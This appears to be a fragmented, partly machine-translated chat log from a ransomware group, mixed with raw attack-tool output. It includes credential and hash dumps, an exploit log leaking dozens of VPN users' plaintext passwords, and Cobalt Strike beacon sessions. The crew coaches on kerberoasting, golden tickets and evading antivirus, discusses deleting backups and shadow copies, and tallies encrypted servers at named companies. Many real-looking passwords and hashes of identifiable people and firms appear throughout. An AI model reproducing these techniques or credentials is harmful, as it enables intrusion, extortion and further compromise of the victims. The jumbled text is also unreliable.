	 * Password : 54 61 54 9d f0 e4 49 b0 67 2d 94 27 d7 d3 6e 8a 7f 52 05 c7 e7 c6 e3 76 68 02 b4 7e e7 37 65 34 a7 c6 8f 0f c6 44 05 40 40 9d 48 0a a6 89 d4 c8 48 ca 3e 99 95 e4 ad dc 2b c8 7d 15 29 83 20 68 5e f5 d6 39 76 bd 7e c1 97 65 55 a9 b1 73 59 37 e1 53 e5 35 17 2a 1f 2e 74 05 6b 57 96 ac 61 ce 76 74 c8 f0 53 ca 26 8c 7e 30 1e 70 03 5e a0 0f a4 7c 31 4c e7 4e c7 54 8c d6 4b 35 52 e7 6e ea eb 80 a4 9d 16 36 50 26 c2 a3 40 d5 9f 0b 6b b0 41 42 d8 41 0c aa c2 d7 78 32 60 79 04 82 ce 7e 5e 53 e2 89 68 d3 37 0e 53 9b 9d 4a 59 c8 c6 32 c3 34 49 72 3c 8c 5e 63 0c cc 88 65 eb 2c c0 6f e1 51 b3 01 20 ab 33 9c 0a 97 b3 be b8 c2 76 21 cd 3a 4d 63 0e 3f 6d 64 9f 00 69 33 54 b0 4f a7 ca 2e dc 17 34 23 81 db c0 ae 52 94 b0 5f b5 e9 21
	ssp :
	credman :

Authentication Id : 0 ; 62665 (00000000:0000f4c9)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2020/10/26 23:27:36
SID :
	msv :
	 [00000003] Primary
	 * Username : HIH-D-22925$
	 * Domain : CN
	 * NTLM : 3909fbffc2df0e29ce348893f4a18b95
	 * SHA1 : 9d1bc75d9c64519e6a1d925aa105bad36e6d0a
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : HIH-D-22925$
Domain : CN
Logon Server : (null)
Logon Time : 2020/10/26 23:27:36
SID : S-1-5-18
	msv :
	tspkg :
	wdigest :
	 * Username : HIH-D-22925$
	 * Domain : CN
	 * Password : (null)
	kerberos :
	 * Username : hih-d-22925$
	 * Domain : CN.NET.NTES
	 * Password : (null)
	ssp :
	credman :

``````
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ab374db304924054507dd9a9a5b513fd:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:cab016c9f1758dc8dc18600415e33576:::

``YES.
```
这项请求将在域 cn.net.ntes 的域控制器处理。

组名 Domain Admins
注释 指定的域管理员

成员

-------------------------------------------------------------------------------
B6823 cnadmin H10151
luot ntes.cn sileiy
winbjplan winplan
命令成功完成。


``Then I do not understand what the problem is.``Lab/Dedic does not count?``We do not have a windup.``There is a windup and https://github.com/quasar/Quasarтак, then take a test empire)``Toolkit has been tested.`` No.``Nets what was/is? On what @tl1HelloWhat are the tasks? ptL1HelloWe are allUnited┌─[input0@parrot]─[~]
└──╼ $ping helpdocpt.club
PING helpdocpt.club (162.0.237.18) 56(84) bytes of data.
64 bytes from impecunious-polder.vpsrdns.web-hosting.com (162.0.237.18): icmp_seq=1 ttl=52 time=206 ms
64 bytes from impecunious-polder.vpsrdns.web-hosting.com (162.0.237.18): icmp_seq=2 ttl=52 time=207 ms
64 bytes from impecunious-polder.vpsrdns.web-hosting.com (162.0.237.18): icmp_seq=3 ttl=52 time=208 ms
64 bytes from impecunious-polder.vpsrdns.web-hosting.com (162.0.237.18): icmp_seq=4 ttl=52 time=414 ms
64 bytes from impecunious-polder.vpsrdns.web-hosting.com (162.0.237.18): icmp_seq=5 ttl=52 time=207 ms@user8 it's not working, there's no session line, I don't know where to put it thank you + just tell him or forward the guide + well you said through the console in the browser please share your experience with @user8 + can you? ok, thanks if there are 2fa you need to go through the sessionvpn to work ``
[+] Checking URL https://66.161.144.31
[+] Found latest version (9.x+) of SMA appliance
[+] Appliance running version 10.2.0.3-24sv

[+] Leaking sessions to dump configuration.
      [+] Found: SessionID: 0hxjuDPHx83Rx4vG8T96wfFnQJGVF4UZhT4JrIxBFCYU= userType: 1 userName: rhaffey Password: Carebear11 Domain: Planes
      [+] Found: SessionID: 1XVOagEBBe6ptLv3yQbhtq0lFpb10KBXlKkRrxUhoKw= userType: 1 userName: mwest Password: Howklmw4 Domain: Planes
      [+] Found: SessionID: 1ckROGo1Wh7imySZPl7uMtcThtOiXie239BHZP95Xho= userType: 1 userName: grikmim Password: mrckk-0020 Domain: Planes
      [+] Found: SessionID: 8hrnUTXzfeMdpqBv0uQ6bZG13AJC8QIEezcikn6rRlU= userType: 1 userName: gexnill Password: Fruitninja22 Domain: Planes
      [+] Found: SessionID: 9pJuG9Tld0RDo08uJYlOoGD0VrQvFKue6qkPfip2dVI= userType: 1 userName: romber Password: Gberry700! Domain: Planes
      [+] Found: SessionID: DNmFdoJaPCMVDgQ1Z4FwvwMTE5QBqtFMiwBe9BOMZjQ= userType: 1 userName: mitriks Password: AEVT030121! Domain: Planes
      [+] Found: SessionID: EWtPIi0Eb05MnQhVXQLSqCTNnEtoz5GqRL0WLvU17sk= userType: 1 userName: redgemmtb Password: Tr!
      [+] Found: SessionID: NeCBR0enViW4ICjFiFeW1F8D92KfgWrTvWgv6007TKM= userType: 1 userName: jmurchis Password: Sabian44987#@ Domain: Planes
      [+] Found: SessionID: OSKex2Y0GoB38oixxxdQQYc0MT5nKJxf4oeKdSo8yxI= userType: 1 userName: kinjens Password: Greeleys7145 Domain: Planes
      [+] Found: SessionID: PFCReDwF0qqxJW36ByuCDpZ5J0Zhdl6AfZr8rwFyNEbo= userType: 1 userName: cenglish Password: Alexa019 Domain: Planes
      [+] Found: SessionID: S52bhF0epI6AWy2O5NVtpUT5rZR2qlVUIRxpfSUXnoM= userType: 1 userName: tilewa Password: Odin2021 Domain: Planes
      [+] Found: SessionID: SiHFTV6qqKeYsOaTDH8xA4PkOvUW36syhQlhyZjBE30= userType: 1 userName: lesdorn Password: MountVernon25** Domain: Planes
      [+] Found: SessionID: W1lJsx3fZ100ndMXQPAceYzqyXC1spoSv0zMq5a5hpg= userType: 1 userName: kyteldra Password: Kcakalpld0517! Domain: Planes
      [+] Found: SessionID: WCrZqMccVULFytN0wPY4rB8K636yaP5cV1W5911pRdg= userType: 1 userName: keynemik Password: LumbarL3 Domain: Planes
      [+] Found: SessionID: Z9sppmZwgJec3Jk0Kcv05sSmQvFwyoe0UVGkv251SeM= userType: 1 userName: dmontgom Password: January2021 Domain: Planes
      [+] Found: SessionID: advcBv38ZtYqUBAZCVVJl6QoZahzK0UPV5JGBzpLNgk= userType: 1 userName: valura Password: Lacapi2021 Domain: Planes
      [+] Found: SessionID: bBNhpCwSpZvM7dA04zlPGZvJoBZdk4Z6HMu9wGm3FVg= userType: 1 userName: jmcgrath Password: 36R-mel*21 Domain: Planes
      [+] Found: SessionID: djXXAOgtFljaj3O9l7OgG2VC8fyYPyPkjb5j1BF1QCNMI= userType: 1 userName: gkeifer Password: Hrmboys8! Domain: Planes
      [+] Found: SessionID: fUvKJ6qa7PkHQWQWcOeUBBRJctY4JUqJtUGDLVSzLGgns= userType: 1 userName: gcarney Password: Happy2021 Domain: Planes
      [+] Found: SessionID: kVgDYoRK1ajqbOijrK1uGLNeXE0T99We5MlZSPkXCg= userType: 1 userName: bbradford Password: H@ndb@ll2021 Domain: Planes
      [+] Found: SessionID: kv38f02A9WSGjNj0xjVedVFinxYdWiyeNZ4aXnYOtCkE= userType: 1 userName: esolotim Password: Qwerty19 Domain: Planes
      [+] Found: SessionID: lY1v5WeWLHRc2qZQyyrHLtBc4rdOk9LzTvffD108Tc= userType: 1 userName: fsmith Password: Castle47####### Domain: Planes
      [+] Found: SessionID: n6R7KD4fgc11jsFwF0KV5iduYKRSPyveO22K7zCO1CE= userName: 1 userName: barnlisa Password: ROSIEb22 Domain: Planes
      [+] Found: SessionID: nRoJ3ZfgAlELS0rtqpLJtpXwRJ6OcBNVflg9KxlcX1s= userType: 1 userName: croltiny Password: globalWORKplace7! Domain: Planes
      [+] Found: SessionID: qB1kBsFrKOLYL4w9aOktA6jYoJTMc68KRJJoXo3siXCnE= userType: 1 userName: mwinters Password: Carnage2021 Domain: Planes
      [+] Found: SessionID: u0Xqpn7w8fS4vZn6SAO1JFUYHUTczh5Y5yeoxebQWWg= userType: 1 userName: sanski Password: Jac2010! Domain: Planes
      [+] Found: SessionID: uxs9u9LxBrtY1Oqrx3WuEJPXOsEvmhgMhvr1JHl3rRw= userType: 1 userName: mshafor Password: February2021 Domain: Planes
      [+] Found: SessionID: v1buCFcYonMDuhyVfRnHwBh6YgNpqjwhTSe5eSMoYu8= userType: 1 userName: ferncroa Password: Bengals21 Domain: Planes
      [+] Found: SessionID: v5i1hwKI0xbE01s9nPuO9F531n0MxrNE0YYyyel2za0k= userType: 1 userName: wbowen Password: Dptwmb2028 Domain: Planes
      [+] Found: SessionID: vu19JgbC8zsPGm0q8phBOqUsKIFtkn9itd00j06MuAI= userType: 1 userName: gflasch Password: Pepper33$ Domain: Planes
      [+] Found: SessionID: wGwVAfJOrLok0CrbbB7g9dUQAlZP2YsQmw9p1113thE= userType: 1 userName: jamafd Password: Hobart2535y Domain: Planes
      [+] Found: SessionID: wbL2CzsEWESKJxcQw13TBJ7ebU4i6bl7qnffGC0n8Afw= userType: 1 userName: obrown Password: Planes0121 Domain: Planes
      [+] Found: SessionID: yNylXi0x041YdNCoxmjaGiwG5Y22WNb4tcqD5Dkid1Y= userType: 1 userName: moordavi Password: Planes1! Domain: Planes
[+] Done with https://66.161.144.31, found 33 sessions
``ahahahaahaahaahaahaahaahaahaahaahaahaahaahaahaahaahaahaahaahaahaahaahaahaahaahaaha
apparently the feds won't let them pay
jana dare: what in the hell
HIDE
49 seconds ago
Support: Hello, are you ready to negotiate?
HIDE
47 seconds ago
jana dare: fuck off
HIDE

``judging from the screenshot in the general I don't know)``they were writing to the feds is hels? 04 came to your account
your guys? pPUnKg2arjexHCi0b6xUm3djAKFrW38CnwoPCirPeZWxAeMRnUXr4Fa7DUxoxbKRspoke in peace) yeah) and i will pass the container) run the adusers through the script to the archive and let it here let the script copy copy copy i do not understand what is happening
i can do the easiest things da and it was not a question * no questions) so, more questions? i can go? it will be within 24 hours, so upload it to a file sharing site fuck it, i'll send a link here with a passport to 100 meters as i know no limit on the size? and here upload the file normally yes? when i come i will give it to you off here yyyy
me too
i've been sitting for 24 hours already i'll upload the archive for you ok? i'm dying
now i'll just sit here and do a couple more things with your parser that can be reopened+ the rest? +++Do you all have personal cobs?:thumbsup:you will find YES we will move on there in the next couple of hours+while we work with matches+we will go back and have a good appetite in half an hour we will continue good half an hourokay, how long? an hour? rather yes than no)snack)we were not told about lunch in these two days so you have lunch?you take hash krbtgt and make yourself a ticket for any MA and you're on a roll)H time passed, maybe even the next day, and all MA have changed passwords, dumps hashes from dx are taken from that including from MA2) it allows you to make a token from any user)) 1) if you get hash from krbtgt, I've never seen a case where you have a hash file from krbtgt somewhere on the disk (don't read it).txt` is also a good question if we got the hash of the krbtgt user
we can do a golden ticket, what can we do with it? just like with ntlm hashes, you throw in a conf - you get the pass once you get the pass immediately passed to you
emeralmatherials.com
```
here's the keb
```
$EPM.LOCAL$MSSQLSvc/SDCEPMVMQAPV02.EPM.LOCAL*$:Fujitsu2012
``Because too serious pass and brute-force does not take) here are the domains in the archive lie, we took kerberos, but finished without it came out, it's all about non-identity, okay. Situation, there is only kerberos hash, what to do with it? Where do I knock? A better question, a counter question, what is the point of getting kerberos hashes if we have never used them? Do you have no help for modules? Yes, knowledge about vectors and what you can and cannot give you useful modules, your task is to study them, document, check and use in practice, you should do this task in another, I can write everything about each module if you do not study the modules they give, what is the point?https://cisoclub.ru/kerberoasting/может you and tell us? more details, what kind of hashes, where from, whose, how they are there, why they are not the same everywhere, etc. gives some output to the console can also write "gives some output to the console") collects hashes from memory, as well as everything else, in principle, just for the record, how does invoke-kerberoast work?and another thing, the better you know how the network works together with Active Directory, the better understanding of what can be done in it we give you only the basics, to show that you can do this, but not always necessary, the better you think in the context of the task in the whole vector so the more you train to do the yuak bypass, look for their own modules for the tasks on the git, read guides, etc. as well as everything else in fact, this can only be cured by experience) inattention you sometimes 3-6 times in the hope that something will change you do not read the findings teams then can add more tools to our arsinal at lunch time? let's sit and do some research at lunchtime[ ](https://mediaeveryone.com/channel/general?msg=HY3ZumpXaCbLmxJPw) from what I've seen[ ](https://mediaeveryone.com/channel/general?msg=QTfEBz7jkqkEardwe) even to give an example, in some zelda you can't pass a riddle, you look at the youtube walkthrough and you're already advanced
just here with the analysis, listen to reasoning, some chips from the "stuffed hand" tackle and then we'll take apart the new materialafter lunch more questions for a couple of hoursmaybe while you go to lunch did not negotiate you lunch an hour off? or you go?[ ](https://mediaeveryone.com/channel/general?msg=WKA2Jom9LuADmvBea) the same rebuilding modules based on the starting environment, just will be faster because the hand is stuffed)2-5) first search for the same command on the same git in c# .net application, then third-party modules that can be imported and as a last resort - download the module to your own dedicata, take the source file and moved by hand into the folder of modules on the target machine - perform the necessary actions - clean up after themselves it is clear, just incredibly interesting to look at the passage of at least one network directly in the field with reasoning, and not like everyone on the Internet on your lab without a hitch2-3) build your own exe version and run the same questions?because you didn't go further than PE, but today we will[ ](https://mediaeveryone.com/channel/general?msg=5sWj3jXdCZqfa2LGg) already on the lp there may be differences at the stage of UAC for example, at the stage of domain disconnection in the EA context so no experience at all.By the way, yes, it would indeed be extremely interesting to see how someone more professional than us works.Not identical sessions, identical actions* understandably not identical, but the algorithm in different contexts is approximately the same
low priv - collect what's available
LA/System - mimic and other more serious things
DA - we haven't used anything but dcsync
Just for the contexts, actions are essentially identical, maybe we are not working as it should, and maybe it is so it's understandable that situations are different and allWe are not just expanding the arsenal, methods, structuringsomewhere you drop AB for 5 minutes of any activity, etc.somewhere nothing of the modules will not work at allwhere you can unroot kerberoast for 10 minutes You understand that sessions are far from identical Yes, from the appearance of the session to the DC by the way where 2 users still?the question at the level of "what if Stalin was alive now", for example, raising privileges for the average life of one session from 1 minute to 4 hours?well once from the side to see what to do after the first session?) the order of what?) well the order of what actions? will there be a "master class" with a description of actions ?[ ](https://mediaeveryone.com/channel/general?msg=guBDpNRBxZXHDQioL) do not know what to describe here - what is required in the user context or tied to it (browsers, winscp, putty etc.) do from the user context, what requires system rights (hashdump, logonpassword) from the system[ ](https://mediaeveryone.com/channel/general?msg=u8SJcuXGnrkeCtBXb) please answer the question you may have when you have tried everything [ ](https://mediaeveryone.com/channel/general?msg=2JB9BEAgsYLjYY8Ae) I never used it but it should be in your arsenal anyway because it could be the last vulnerability to raise your rights) you have a mindmap and you can go to any point you want [ ](https://mediaeveryone.com/channel/general?msg=XTmBDzwfkSKsKXJHh) it depends on the problem. if your session crashes - you see what AV, if you need to get on the target machine - idletime, the maximum useful information is passwords and hashes, because you will at least have a dictionary for the brute force, at most you will have a dictionary for the brute force attack, and at most you will have a system to try to reach other hashes/passwords. The point is you can't hashdump without a rights system, right?passwords, hashes, that's why I asked the question, what to look for in winpis a lot of information about elevating privileges via dllhijack - how often is this technique used in real life? does it make sense to mess around with it?
  Target : MicrosoftOffice16_Data:orgid:simon.bolley@gpj.com
  UserName :
  Password : Canada!75
  CredentialType : Generic
  PersistenceType : LocalComputer
  LastWriteTime : 1/21/2020 9:16:27 AM
``Skip open your seatbelt on gpj of course)``I never found passwords in winPEAS and seatbelt. These questions are answered by the modules above-the question is where they are and how to get them-the maximum benefit is passwordswhat did I get out of them in chat, what was useful and what was worth getting out, what was not worth getting out-I mean besides there list of balls, AV and other things, what would be useful to get out?it's all by category and there's a link to the site with a description
```
https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation
``````
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
``[ ](https://mediaeveryone.com/channel/general?msg=QgGf843gNp4ZJSSBb) as an option idletime to check when was the last user activity before you enter by rp2-1) got an error - google it, in time you will learn popular errors (cobaltstrike error 5 - If you get an error 5 (access denied) after you try to link to a Beacon)
2-2) on passwords and "interesting" files that may contain passwords. you can also look for internal portals that may be vulnerable (ala sql injection), which will allow you to open a session already on the server
2-3) don't understand the question.
2-4) let's leave the question for now.
2-5) don't understand the question.
2-6) koba itself adds this information when you scan through portscan hosts and koba sees the OS, it will automatically add it to the Targets, the command adds a Hashdump hashes, etc., Type in addition to the default AdFInd and other collectors, what you can in low priv yute? can shed on which tools are best used in what contexts pro 2-2 support, maybe in `group ` instead of `all ` makes sense to specify something else in some cases?

The same about winPEAS, the conclusion is gigantic, but what is the most useful to pull out? first questions on the already existing knowledge and experience, then how to understand `disassemble the network`?VladislavHolding said in the video that we were not taught how to parse the network, which tools are better to use and in what cases (at least a couple for a more detailed study of them) about 1, I can assume the way you work, that you do not return the original context after creating tokens. And the modules require requests to the `psinject` - `This is ideal for long-running jobs or injecting PowerShell-based agents (e.g., Empire) into a specific process` 1) This is taken from PowerView via psinject :^), but the point is that it popped up with both Invoke-Kerberoast and SMBAutoBruteThis release integrates Lee's work with Beacon. The `powerpick [cmdlet+args]` command will spawn a process, inject the Unmanaged PowerShell magic into it, and run the requested command.

I've also added `psinject [pid] [arch] [command]` to Beacon as well. This command will inject the Unmanaged PowerShell DLL into a specific process and run the command you request. This is ideal for long-running jobs or injecting PowerShell-based agents (e.g., Empire) into a specific process1) what module?
2) All possibilities are on the git info page, where you can find the help)
3) psinject is running psh code in a different process, this prevents you from killing the session if psh code execution is detected in the system
4) don't know, never used this argument)
5) `execute-assembly /SharpChrome.exe logins /showall` 1. This error:

```
ERROR: Exception calling "FindAll" with "0" argument(s): "The user name or password is incorrect.
ERROR: "
ERROR: At line:13117 char:24
ERROR: + else { $Results = $GPOSearcher.FindAll() }
ERROR: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ERROR: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
ERROR: + FullyQualifiedErrorId : DirectoryServicesCOMException
ERROR:
```
What's the problem with this one? How do I get around it? What does it mean?


2. "rubeus is a more serious tool ;-)"
What other features does it have besides asreproast and kerberoast?

3. What is the main difference between powerpick and psinject, if you say that the latter is better than the former,
but the former worked yesterday in powerView, unlike the latter?

4. What is the meaning of ` /privileges:enable` argument at `wmic` if specifying LA/DA credentials?

5. How to work with SharpChrome, not SharpWeb, but Chrome. It does not have the most understandable help, how many attempts have not been - in vain so what? minutes to prepare a list of the first hour we will deal with general questions about the software, vectors, etc.hi:space_invader:Good morningGood morning, we are waiting for now, this week we will get and sessions and a new tool.hhs on sessions ?good afternoon all )maybe on the Spacewalk crescendo find through this program it backups only on the computer, i'm looking for in the browser can check the cloud sync settings please he backups to san1? and look please install date softalol) a little more ``a little bit ``.
Teemo[FILES]Administrator */4144|2021Feb02 02:03:39> idle
[*] Tasked beacon to run .NET program: IdleTime.exe
[+] host called home, sent: 111147 bytes
[+] received output:
  CurrentUser : FILES\Administrator
  Idletime : 08h:09m:20s:125ms (0 milliseconds)
```
No, not yet)Do you want to go to the rdp and see the goo? It happens, try from another car to throwProsya as not alive some pages for five minutes opensadmin't you found it?
Microsoft_WinInet_127.0.0.1:8888/Resilio Sync\OVERLAND\administrator 01 00 00 00 00 d0 8c 9d df 01 15 d1 11 8c 7a 00 c0 4f c2 97 eb 01 00 00 00 1d e4 39 cf 1d a3 58 45 b0 85 d2 13 e4 2f f1 8a 00 00 00 18 00 00 00 57 00 49 00 4e 00 49 00 4e 00 45 00 54 00 43 00 00 72 00 65 00 64 00 00 00 03 66 00 00 c0 00 00 00 10 00 00 00 71 ea fe 67 c8 17 d9 2c 2e 12 e4 22 8c 22 43 02 02 00 00 00 00 00 04 80 00 00 00 a0 00 00 00 10 00 00 00 b5 19 a8 93 30 eb e3 90 7f 59 42 64 56 a9 7c 6b 30 00 00 00 00 dd bc 4f 35 c9 ac 00 f0 56 0a 70 a6 60 e4 c4 6d 18 6c 69 34 b7 bf db 4d e1 39 88 82 9b e4 79 1a d9 ca bc 53 b8 58 9b 97 f7 e7 c6 6a 09 d6 36 c0 14 00 00 00 b6 44 ee 96 18 c2 65 dc 9b 49 d4 dd 0f 06 a1 26 bb fb 32 9f
``````
http://10.69.0.22:5000/ --------------------------- nas
https://10.69.0.173/login.html ------------------------- idrac-HYPERVDEV2|PowerEdge R320
https://10.69.0.70/login.html --------------------------- idrac-7ND5CZ1 | PowerEdge R520

``There was a paste pass in the story, but no kred, I thought that his kreds would fit, wrote that would not lock in the future on the paste pass was in his browser? to ``https://lastpass.com` where? Logan has a paste pass, but the password ``M@ythe4th!`` did not fit.
URL : https://mail.overland.com/
Username : overland\administrator
Password : Vi3wSon!c
``````
URL : https://id.atlassian.com/signup/welcome
Username : logan@overland.com
Password : M@ythe4th!
``````
URL : https://gravityzone.bitdefender.com/
Username : logan@overland.com
Password : M@ythe4th!
``````
10.69.26.205\OVR026-R002\R002 r002
10.69.0.242\TEST044-R002\R002 r002
``two domains out of three or four pkdas.''
in that domain already work, as you prepare, I will give you sessions of 2 extended domains

So there are two more domains?
You can see only one trust first get in here and work there?
Pinging AD1.overland.com [10.69.0.35] with 32 bytes of data:
Reply from 10.69.0.35: bytes=32 time=10ms TTL=127

Ping statistics for 10.69.0.35:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 10ms, Maximum = 10ms, Average = 10ms

beacon> portscan 10.69.0.35 445 none
[*] Tasked beacon to scan ports 445 on 10.69.0.35
[+] host called home, sent: 93285 bytes
[+] received output:
10.69.0.35:445
Scanner module is complete
``user9tl2ot``
overland.com\dynamics:bobc@t!
overland.com\Administrator:Vi3wSon!c
overland.com\mahesh.admin:Changeme!
overland.com\zerto:CR@CKer$
``I don't know what NAC is)`` only the document directory was empty, the rest were already empty, or did you clean it up?``

 Directory of \89.0.10.104\Music

04/10/2019 04:05 PM <DIR> .
04/10/2019 04:01 PM <DIR> .
               0 File(s) 0 bytes
               2 Dir(s) 1,660,207,595,520 bytes free

[+] received output:
 Volume in drive \89.0.10.104\Pictures is Pictures
 Volume Serial Number is 8C90-29F2

 Directory of \89.0.10.104Pictures

04/10/2019 04:05 PM <DIR> .
04/10/2019 04:01 PM <DIR> .
               0 File(s) 0 bytes
               2 Dir(s) 1,660,207,595,520 bytes free

beacon> shell dir \\89.0.10.104\Videos
[*] Tasked beacon to run: dir \89.0.10.104\Videos
[+] host called home, sent: 55 bytes
[+] received output:
 Volume in drive\\89.0.10.104\Videos is Videos
 Volume Serial Number is 42A8-E058

 Directory of \89.0.10.104/Videos

04/10/2019 04:05 PM <DIR> .
04/10/2019 04:01 PM <DIR> .
               0 File(s) 0 bytes
               2 Dir(s) 1,660,207,595,520 bytes free

``Either they rolled it back somehow or we didn't shut it down it didn't work during the lock? I'm on it under rdpne shut down for some reason``
dn:CN=FR-VIR2008-02,OU=Beaune Servers,OU=RTP,DC=rtpco,DC=local
>objectClass: top
>objectClass: person
>objectClass: organizationalPerson
>objectClass: user
>objectClass: computer
>cn: FR-VIR2008-02
>distinguishedName: CN=FR-VIR2008-02,OU=Beaune Servers,OU=RTP,DC=rtpco,DC=local
>instanceType: 4
>whenCreated: 20170630081330.0Z
>whenChanged: 20201222161043.0Z
>uSNCreated: 3171670
>info: General
>uSNChanged: 7602866
>name: FR-VIR2008-02
>objectGUID: {1A3B911B-4323-4851-905A-C22EE5FB2BC5}
>userAccountControl: 4096
>codePage: 0
>countryCode: 0
>lastLogon: 131862572618621371
>localPolicyFlags: 0
>pwdLastSet: 132515171874060018
>primaryGroupID: 515
>objectSid: S-1-5-21-3928074412-3075804946-2887454908-18665
>accountExpires: 9223372036854775807
>logonCount: 0
>sAMAccountName: FR-VIR2008-02$
>sAMAccountType: 805306369
>operatingSystem: Windows Server 2008 R2 Standard
>operatingSystemVersion: 6.1 (7601)
>operatingSystemServicePack: Service Pack 1
>dNSHostName: FR-VIR2008-02.rtpco.local
``I'd like to get an rdp on the server, mask the disk, and run a utility, I'll get right on it``
104.243.44.69:13574
Cqr7797e1iSJyzFwnyTPoECVpWqqOSUGUZ7

``Work through this kobua, you'd better not spawn there are about 10 alive3056``.
beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
[+] received output:
rtpco.local
``I don't have a livekind in which cob? no more? and delete the shadow copies there frispace after deleting backupatut someone 1 need to make a note)
thank you fine once you've deleted it, fuck it.
beacon> help mv
Use: mv [source file] [dest file]

Move source file to the specified destination
beacon> help cp
Use: cp [source file] [dest file]

Copy source file to the specified destination
``and cp like cb like cb can also mvdata about del? shell del jethacjust rm in cb works and shell rm does not let me wonder....the funny thing is that through the command does not let me delete, but through the gui all right deletes but strange fuck that does not let me change but lets me delete))) check the other folders sosyakses of danayd I can not understand what the fuck, copy muv not work, but tear it down to rubbish mozhet you move them somewhere and shishifuye?really? and maybe just delete them and not bother? that will overwrite it? echo 1 > backup file oldest[ ](https://mediaeveryone.com/group/1-done-rtpcompany-com?msg=skgH6wEiuWraA93mM) this[ ](https://mediaeveryone.com/group/1-done-rtpcompany-com?msg=9iffb4WttEQtYmzbk) yes the rest of the files are also busy processes? as i understand, no rights to these files
i have write permissions to write to them i also have this bug on 2 types of files. so what? or only 1 last one? why are you surprised that it did not work? @tl2 said it depends on the edition + he said it protects the process and you did it through mapp[ ](https://mediaeveryone.com/group/1-done-rtpcompany-com?msg=X6jW2zvhB4xZy4DAc) .there was kasper on armas? swallowed right on the frame)))) said kasper fucks with it))) @tl2do write them the same extensiona rename the files on the pesa restart on the servers where the process is not finished? all 5 are still alive[ ](https://mediaeveryone.com/group/1-done-rtpcompany-com?msg=CLumsmxBztKP6w9pw) alreadyeeeee and from there start or on the arm live on the server where there is a sessionIn the old ones, all normal encrypted and was visible as the grid lay down, but here it was like a bitch terminatorzamapte this nasnet, there was like everything was similar that only part of the files closed? in the old networks mean the same ?[ ](https://mediaeveryone.com/group/1-done-rtpcompany-com?msg=zaEjaabka5bHD9ZZM) see, just uploaded at this point there?well i threw the file there with dk under the creeds and from the server under other creeds (creeds and cars from different domains) write access is exactly there? yesterday i zamped it to 2 cars, today i checked and mapped to another 3 and run again on the 5 cars before it was the same? + dk on 5 different cars nas where was it mapped?the rest of them all are still alive? a few cars flew away[ ](https://mediaeveryone.com/group/1-done-rtpcompany-com?msg=huJe2tEuab32Xa7C9) ?the file is 300 kb if it says it's broken then open and open it which is not closed take 1 dock file no sessions? VirtualAlloc sees and all will fall in the principles of injection and you end up with a session
but even INHERIT nothing, not even a small process) as soon as the process is created - kasper protects itIt means that you "create" the process and not injected into another one it staging channel from his file establishesbacon "in itself "neta bicon is not injected?it's not injected in any way (it can skip the start of the binary if it's cleaned out normally but it's only a question of editorial independence i haven't met it and even comet flushes with scasper))) plus it starts onboot it can't be nailed down it misses a session
but he won't let it get in the way, kasper's exactly
very very angry in the right edition but it depends on the editionDon't bitdeffende on admin's computer the strongest averter is kasper in terms of meme integritimb confuse again kasper or kaseya? kasper we can't outrun the injector
kasper it's bad they put him on protection lately lissimantik has become bitingThere kasper underpoint on some chtiolsamantek - very formidableA what about wilson with aver? and 1 on 2 others)3 people will work with him so that wilsonart not all so easy)we have a problem in wilsonart
there are 6 trusts still have access, but either the dll crashes or the traffic is blockedd there are two more with the rights + 2 more or new will come? so there is only left #wilsonart-comna tomorrow planned 3 grids for the day)tomorrow to 51.done.rtpcompany.comas tomorrow to what time?
winona.rtpco.local
118 cars per hell
64 armies on the winona (10 alive)
53 servers (71 alive)
``Everything's pulled and everything's encrypted,``
``It's fine, it's not pulled, but it's mapped and the crits are killed
```
8 servers didn't pull up
``us.alloypolymers.com
Closed servers 24 out of 24
Armas pulled up all 23rtpco.local
Closed servers 64 out of 65
Armies pulled all 152
one dk fell off\schedule, he some bullshit counts not the whole hell not the whole stats closed write how many were pinged yes, the status is preparing ``
rtpco.local
65 servakov
152 arma
```
```
us.alloypolymers.com\
arm 23
serv 24
```
No 8 servers were connected? So at least the temp and sys32a drive is different? type D or maybe there is some other one? and the Windows folder is untouched? I guess it does not go there or there``?
06/19/2019 07:00 PM <DIR> Windows Defender
06/10/2020 01:13 AM <DIR> Windows Mail
06/10/2020 01:13 AM <DIR> Windows Media Player
07/16/2016 07:23 AM <DIR> Windows Multimedia Platform
07/16/2016 07:23 AM <DIR> Windows NT
06/10/2020 01:13 AM <DIR> Windows Photo Viewer
07/16/2016 07:23 AM <DIR> Windows Portable Devices
07/16/2016 07:23 AM <DIR> WindowsPowerShell

``but the program files and x86 program files are untouched this is today's date to see if you can check the touch dates of the files and folders with your hands repawn? ``The appearance of a note is no guarantee that the locker went through the entire hard drive``.
I've had one die, but the rdmi on it showed up
```
if the process fell off where the injected - then the locker stood up, and after the process did not fall off? came to me one died out, but the udmi on it appeared and the statistics for all domains-sessions were not colored during the inject?
we went around the cassette.
it seems))) for joy, what do you mean, if there's everywhere, you can slam the dk already =)) check it out there are dodobites and dk all when everything else dies dk fuck them at the end as always, except dk@tl1@tl2?there are some other services that can take up important data there is nothing to add to the batik? just in case you have questions, do not forget to leave the services on the mapped cars if you do not have it will not finish you roadmap) sure what above do not pull @tl1``?
pth us.alloypolymers.com\adonixadmin 88781646e2a2399370c54bae7f790e58
ALLOYAMMS: 10.1.1.231
ALLOYCRKT01: 10.1.5.250 -
OHSPICEWORKS: 10.1.10.11 -
ALLOYORGAPP01: 10.1.8.11 -



ALLOYLICWEB: 10.1.1.238 ---
ALLOYAPP3: 10.1.1.250 ---


rtpco.local\O365Service 7facdc498ed1680c4fd1448319a8c04f
 
AXFORMS-DEV: 10.89.11.111 -
ONBASETEST: 10.89.11.10 -

89.0.10.121 -
